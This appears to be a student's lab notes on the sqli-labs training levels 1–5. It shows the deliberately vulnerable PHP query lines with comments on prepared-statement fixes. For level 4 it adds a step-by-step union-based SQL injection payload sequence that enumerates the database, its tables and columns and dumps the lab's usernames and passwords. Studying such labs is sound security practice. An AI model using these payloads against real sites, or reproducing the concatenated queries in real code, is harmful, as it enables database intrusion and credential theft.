sqlilab


1

首先,打开sqlilab的第一关

?id=1 回显正常;?id=1' 报错,说明单引号被原样拼进了 SQL 语句;?id=1 --+ 正常;?id=1' order by 3--+ 正常;?id=1' order by 4--+ 报错,所以字段数为 3。
?id=-1' union select 1,2,3--+ 显示回显点,即页面上会输出查询结果的是哪几列。

// Level 1 query. $id is interpolated into the SQL text inside single quotes,
// so the statement is built by string concatenation rather than with a bound
// parameter. $id presumably comes from the ?id= request parameter shown on
// this page -- its assignment is not visible here.
// LIMIT 0,1 returns at most one row.
// Mitigation: a prepared statement (PDO or mysqli) with $id bound as a value
// keeps the input out of the SQL grammar.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
// The value sits between ' and the trailing ', so a quote inside $id ends the string literal early

2

// Level 2 query. $id is placed in the statement with no surrounding quotes,
// i.e. in a numeric context, so whatever follows the number in $id is parsed
// as SQL. Still string-built SQL.
// Mitigation: bind $id as an integer parameter, or cast it with (int) before
// it reaches the query.
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
// Checked with the boolean pair "and 1=1" / "and 1=2" appended to the value

3

// Level 3 query. Same concatenation pattern, with the value wrapped as
// ('$id'): a single-quoted string inside parentheses. The added parentheses
// change the syntax around the input but do nothing to neutralise it.
// Mitigation: bind $id through a prepared statement instead of interpolating it.
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
// The delimiter that closes this context is ')

4

// Level 4 query. The first statement wraps the raw value in literal double
// quotes; the second interpolates the result inside parentheses, so the final
// SQL reads id=("<value>"). No escaping is applied in either step.
// Mitigation: bind $id through a prepared statement instead of building the
// quoted string by hand.
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
// The delimiter that closes this context is ")
1.  ?id=1")--+
2. ?id=1") order by 1--+
3. ?id=-1") union select 1,2,3--+
4. ?id=-1") union select 1,2,database()--+ //库名为security
5. ?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ //表名 emails,referers,uagents,users
6. ?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='emails' and table_schema='security'--+ //字段名 id,email_id
7. ?id=-1") union select 1,2,group_concat(id) from users--+ //1,2,3,4,5,6,7,8,9,10,11,12,14
8. ?id=-1") union select 1,2,group_concat(id,0x7e,password) from users--+ //1~Dumb,2~I-kill-you,3~p@ssword,4~crappy,5~stupidity,6~genious,7~mob!le,8~admin,9~admin1,10~admin2,11~admin3,12~dumbo,14~admin4

5

You are in...........
这里页面只返回固定的 "You are in...........",不回显查询结果,所以联合查询就用不了了,学一下报错注入